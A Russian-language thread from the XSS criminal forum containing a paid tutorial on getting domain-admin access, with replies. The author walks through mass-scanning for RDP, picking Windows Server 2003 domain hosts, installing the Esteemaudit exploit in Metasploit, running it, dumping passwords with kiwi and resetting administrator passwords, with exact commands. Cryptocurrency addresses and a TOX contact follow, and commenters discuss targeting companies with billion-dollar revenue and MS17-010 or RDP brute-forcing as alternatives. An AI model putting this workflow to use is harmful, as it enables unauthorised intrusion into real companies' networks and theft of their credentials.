• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем DA доступы 2023

Boss2024

RAID-массив
Забанен
Регистрация
06.04.2023
Сообщения
97
Реакции
48
Пожалуйста, обратите внимание, что пользователь заблокирован
Платный контент. Куплено: 5.

Статья как сделать кнопку бабло и нажимать на нее

Сегодня ты прочитаешь то что никогда не читал и никогда бы не узнал.
Лучшая статья по добыче доступов специально для XSS
Тебе нужно будет всего 2 сервера Ubuntu/Debian и Win.
Еще нужен палец что бы нажимать кнопку бабло.

Часть #1 Поиск таргетов

1. Сканируем диапазоны в masscan на порт 3389
2. На Win сервер устанавливаем программу для проверки ip:port на наличии там RDP и сортировкой на NLA/NONLA
Я буду использовать NLAChecker. В комплект z668 входит ее аналог. Можно использовать его софт.
3. Переносим файл сканов с сервера masscan на Win сервер и запускаем NLAChecker указав этот файл.
Количество потоков больше 10.000 ставить не рекомендую.
Таймаут 30-50 и жмем ентер.

1681983337458.png


1681983456828.png



4. После того как программа отработала будет два файла Good(NLA).txt и Good(NONLA).txt
Нам нужен второй файл. В нем будет список ip:port.
5. Далее нам нужна программа RDP Recognizer z668
Загружаем в нее список Good(NONLA).txt и устанавливаем в настройках галочку у пункта Save Screenshots
Жмем кнопку Start

1681983598703.png



6. После завершения работы рекогнайзера в папке Screenshots будут скриншоты окна авторизации этих ips
Выбираем среди них Windows Server 2003 x32 с полем выбора домена

1681983706871.png


1681983728350.png
https://xss.pro/attachments/55095/?hash=cf04ed2d3c92303aaf4b734882e5620d
6. Сохраняем название этих скриншотов в блокнот(ip;port это и есть название)

Часть #2 Взлом

Перед тем как начать взламывать нужно установить все необходимое на Ubuntu/Debian сервер.

1. Устанавливаем Metasploit следующими командами
Код:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

2. Добавляем RCE в метасплоит следующими командами
Код:
git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
cd Esteemaudit-Metasploit
cp esteemaudit.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/
mkdir /usr/share/esteemaudit
cd files
cp * /usr/share/esteemaudit/
dpkg --add-architecture i386
apt-get update && apt-get install wine32
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 2>0

3. Запускаем метасплоит командой msfconsole

4. В метасплоите используем команды
Код:
use exploits/windows/rdp/esteemaudit
set target 9

1681984214404.png


5. Выбираем таргет командами
Код:
set RHOSTS ип таргета
set RPORT порт таргета

И вводим команду run для запуска эксплоита

После успешной эксплуатации вылезет сессия

1681984307208.png



7. Получаем кредтсы учеток командами
Код:
load_kiwi
creds_all
В итоге сдампит пароли от учеток
1681984378430.png


8. Можно самому установить пароль от администратора если его не указалось в дампе
Вводим команду shell и откроется кмд.

1681984456627.png



Это работает когда на таргете нету локальной группы(очень часто)

9. Подключаемся к RDP используя полученные кредсы

Дополнение:
Если хотите сотни тысяч таргетов. Сканируйте порты 1000-65535 и точно так же загружайте в софт для проверки RDP. Будут корпы с миллиардным ревеню.
Если хотите автоматизировать поиск таргетов в скриншотах даю подсказку. На нужных скриншотах вин 2003 есть небольшая стрелочка рядом с полем выбора домена.
Можно написать скрипт который будет искать наличие этой стрелочки на скриншотах и записывать его название в файл.
Первое время буду отвечать на вопросы. Токс и личка всегда доступны. На форуме очень часто.

Если у тебя будет желание помочь на мое дальнейшее развитие в этой сфере:
Bitcoin - bc1qu5ae7zuchygyltleae3n6s867weyqmlewhvkec
Ethereum - 0x652BcbdD6b20A8fff43Bb1b18B4354ef22805602
Monero - 8BTCuy8MabyD6NJzQVxFqrW33YRy7CJHLje5wUrNqvb27wLYTCEx6YycuqJARFLZh76dw9gudKn3i2AjkRWZB2hHVU7koWJ
Tether USDT - 3DkApFs2iv76d8SN5cWtASS3CS17U9rXjU
 

Вложения

  • 1681983738662.png
    1681983738662.png
    10.1 КБ · Просмотры: 1 928
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
В будущем опубликую еще несколько статьей для форума если у этой будет положительный отклик.
 
https ://www . cisa . gov/known-exploited-vulnerabilities-catalog
Каталог известных эксплуатируемых уязвимостей
А из этого можно сделать кнопку бабло побольше ?))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
https ://www . cisa . gov/known-exploited-vulnerabilities-catalog
Каталог известных эксплуатируемых уязвимостей
А из этого можно сделать кнопку бабло побольше ?))
У меня есть еще несколько мыслей в голове из чего можно сделать статью. На это нужно время и желание.
Дополнил реквизиты.
Для тех кто прочитал и решил оценить текст статьи в $ или просто помочь на дальнейшее развитие в сфере.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Чую после этого массовое сканирование от зелёнке - гарантировано. Может нужно было немного тему подхаид?
Если есть мозги метод будет работать долго. Порт 3389 указан для примера. Если сканить 1000-65535 там всегда будут очень крупные таргеты. Миллиард ревеню не придел там найти.
TOX с круглосуточной поддержкой по статье: FC1FD308A5FA28015E0195ACACB2D66E01C10C98386555B2DA1156C80B599F7E09481A7978DC
Такого никогда не было на форуме! Статья как добывать доменных админов одним нажатием кнопки ентер и круглосуточной поддержкой любых вопросов.
 
Закину свои 5 копеек
2003 в наше время найти в норм странах уже тяжеловато, кнопкой "бабло" это назвать можно с большой натяжкой
И если говорим о старых ос, почему бы просто не сканить сеть через нмап на ms08-67 и ms017-010, для последнего 100% отработка будет тем же ms17_010_psexec и его аналогами
Тогда не нужно ставить такое количество потоков, все более-менее чистенько. Просто как пример.
А за старания лайк, молодец)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Закину свои 5 копеек
2003 в наше время найти в норм странах уже тяжеловато, кнопкой "бабло" это назвать можно с большой натяжкой
И если говорим о старых ос, почему бы просто не сканить сеть через нмап на ms08-67 и ms017-010, для последнего 100% отработка будет тем же ms17_010_psexec и его аналогами
Тогда не нужно ставить такое количество потоков, все более-менее чистенько. Просто как пример.
А за старания лайк, молодец)
Их еще много. Если на нестандарт портах из под сотню тысяч можно найти.
Ms17-010 это смб эксплоит. То что я тут опубликовал это уязвимость на серверах которые в домене. Другие этим эксплоитом не взломаешь.
Для ms17-010 намного меньше таргетов. Как минимум из за того что порт один и нестандарт в смб никогда никто не использовал. РДП висит на разных портах. Это очень вероятно. На опыте скажу что именно 2003 очень часто на нестандарт порт ставят.
 
Сегодня ты прочитаешь то что никогда не читал и никогда бы не узнал.
Лучшая статья по добыче доступов
Слишком громко.
Банальный брут серверов одним словом. Ничего нового. Кстати тут на форуме есть статья по бруту дедиков раз на то пошло, где очень обшырно всё расписано по этой теме. Твоя и рядом не стоит. Ни слова про банальную учётку и так далее. Насканил депы, запихнул айпишники, пассы и логины и нажал старт. Да даже настройка софта, потоки и так далее нужно учитывать. Тем более если софт кряк
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Слишком громко.
Банальный брут серверов одним словом. Ничего нового. Кстати тут на форуме есть статья по бруту дедиков раз на то пошло, где очень обшырно всё расписано по этой теме. Твоя и рядом не стоит. Ни слова про банальную учётку и так далее. Насканил депы, запихнул айпишники, пассы и логины и нажал старт. Да даже настройка софта, потоки и так далее нужно учитывать. Тем более если софт кряк
Ты когда читал не прочитал?)
В статье использован эксплоит для которого не нужна предварительная авторизация и который дает права админа к домену.
 
Ты когда читал не прочитал?)
В статье использован эксплоит для которого не нужна предварительная авторизация и который дает права админа к домену.
Не до конца прочитал, мой косяк. Ну это масс эксплойт. По сути как и блюкип. Скорее всего уже патчена вульна на 99% серверов. Тем более эксп вроде старий вовсе
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Не до конца прочитал, мой косяк. Ну это масс эксплойт. По сути как и блюкип. Скорее всего уже патчена вульна на 99% серверов. Тем более эксп вроде старий вовсе
Блюкип вероятность того что эксплуатация пройдет успешна 1%(меньше)
Тут 90% что после запуска эксплоита через полминуты ты получишь сессию
 
Блюкип вероятность того что эксплуатация пройдет успешна 1%(меньше)
Тут 90% что после запуска эксплоита через полминуты ты получишь сессию
К статье вопросов нет, чтоб не в обиду. Плюс даже поставлю за старания, что не флуд и фулл копипаст с гуугла. А хоть от себя что-то. Я о том, что уязвимость фикшена на многих серверах. Ну что-то достать можно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
К статье вопросов нет, чтоб не в обиду. Плюс даже поставлю за старания, что не флуд и фулл копипаст с гуугла. А хоть от себя что-то. Я о том, что уязвимость фикшена на многих серверах. Ну что-то достать можно
Главное немного помыслить и таргеты будут в огромных количествах идти ) Спасибо за реакцию.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Под хайд минимальный хотя бы закиньте. ;)
Зачем? Закрытой регистрации форума достаточно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Эксплойт 2017 года если что
Да. Сравни с eternalblue который того же года. На ентернал ни одного таргета нету. Тут их море.
 
Из личного опыта с брутом рдп - у вас будет 70% таргетов с рев 5кк, 20% с 10-15кк и может быть процентов 10% больше - но лярдники? Ни одного не попадалось за несколько лет - при том что юзались нестандарт порты и пароли сбрученные были не john123
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх